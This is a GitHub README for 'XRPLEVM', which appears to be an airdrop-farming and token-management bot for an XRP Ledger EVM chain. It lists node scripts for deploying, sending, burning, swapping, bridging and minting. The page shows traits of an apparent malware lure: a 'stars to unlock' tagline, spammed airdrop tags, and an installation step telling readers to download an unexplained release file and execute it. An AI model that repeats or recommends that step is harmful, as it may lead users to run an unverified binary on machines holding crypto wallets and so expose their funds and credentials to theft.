Skip to content

Auto deploy, send, burn, swap, bridge, add liquid pool, mint tokens. [500 STARS TO UNLOCK]

Notifications You must be signed in to change notification settings

Wizmithaaa/XRPLEVM

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
 
 
 
 

Repository files navigation

XRPLEVM 🚀

GitHub stars Version License

Welcome to the XRPLEVM repository! This project offers a comprehensive toolkit for working with the XRP Ledger in an EVM-compatible environment. You can auto-deploy contracts, send tokens, burn assets, swap currencies, bridge assets, add liquidity pools, and mint tokens with ease.

Table of Contents

Features

  • Auto Deployment: Easily deploy smart contracts on the XRP Ledger.
  • Token Management: Send, burn, and mint tokens effortlessly.
  • Swapping and Bridging: Swap tokens and bridge assets between different networks.
  • Liquidity Pools: Add and manage liquidity pools.
  • Airdrop Functionality: Claim and manage airdrops effectively.

Installation

To get started with XRPLEVM, follow these steps:

  1. Clone the repository:

    git clone https://github.com/Wizmithaaa/XRPLEVM.git
  2. Navigate to the project directory:

    cd XRPLEVM
  3. Install the required dependencies:

    npm install
  4. Download the latest release from Releases and execute the file.

Usage

Auto Deploy

To auto-deploy a contract, run the following command:

node deploy.js <contract-file>

Replace <contract-file> with the path to your contract file.

Send Tokens

To send tokens, use:

node send.js <recipient-address> <amount>

Burn Tokens

To burn tokens, execute:

node burn.js <amount>

Swap Tokens

To swap tokens, run:

node swap.js <from-token> <to-token> <amount>

Bridge Assets

To bridge assets, use:

node bridge.js <asset> <destination-network>

Add Liquidity Pool

To add a liquidity pool, run:

node addLiquidity.js <pool-name> <token1> <token2> <amount1> <amount2>

Mint Tokens

To mint new tokens, execute:

node mint.js <amount>

Contributing

We welcome contributions to XRPLEVM! If you want to help improve the project, please follow these steps:

  1. Fork the repository.
  2. Create a new branch (git checkout -b feature-branch).
  3. Make your changes.
  4. Commit your changes (git commit -m 'Add new feature').
  5. Push to the branch (git push origin feature-branch).
  6. Open a pull request.

Please ensure your code adheres to our coding standards and includes appropriate tests.

License

This project is licensed under the MIT License. See the LICENSE file for details.

Links

For the latest updates and releases, check out the Releases section.

Explore the topics related to this project:

  • airdrop
  • airdrop-application
  • airdrop-claim-bot
  • airdrop-farm
  • airdrop-free
  • airdrop-huner-download
  • airdrop2024
  • airdrop2025
  • chain
  • evm
  • layer1
  • layer2
  • layer3
  • meomundep
  • xrp
  • xrplevm

Screenshots

Auto Deploy
Auto Deploying Contracts

Token Management
Managing Tokens

Liquidity Pool
Adding Liquidity Pools

Community

Join our community to stay updated and get help:

Thank you for your interest in XRPLEVM! Together, we can build a powerful toolset for the XRP Ledger ecosystem.